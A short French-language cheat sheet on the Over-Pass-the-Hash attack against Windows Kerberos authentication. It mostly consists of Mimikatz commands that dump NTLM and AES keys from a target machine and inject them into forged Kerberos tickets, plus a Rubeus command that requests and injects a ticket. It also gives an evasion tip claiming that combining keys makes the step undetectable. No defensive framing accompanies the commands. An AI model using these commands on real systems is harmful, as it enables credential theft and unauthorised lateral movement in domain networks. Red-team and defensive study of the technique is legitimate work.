Over Pass the hash est une combinaison de passage du hash et de passage du ticket. Permet la création de tickets Kerberos à partir de clés de hachage NTLM ou AES qui autorisent l'accès au service de ressources nécessitant une authentification Kerberos.

Avec Mimikatz

privilege::debug
sekurlsa::ekeys

ekeys va permettre d'afficher toutes les clés NTLM (RC4), AES128 et AES256 de la machine cible.

Ainsi, avec l'aide de la commande sekurlsa :: pth, nous pouvons essayer d'utiliser la clé ase256 ou aes128 pour le ticket Kerberos.

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<hash> 
sekurlsa::pth /user:<username> /domain:<domain> /aes128:<hash>

Si vous utilisez simultanément NTLM (RC4), ASE128, ASE256 pour l'injection dans le ticket Kerberos, cette étape est plus sécurisée et indétectable dans le réseau.

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /aes128:<hash> /aes256:<hash>
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>

Avec Rubeus

Rubeus.exe asktgt /domain:<domain> /user:<username> /rc4:<hash> /ptt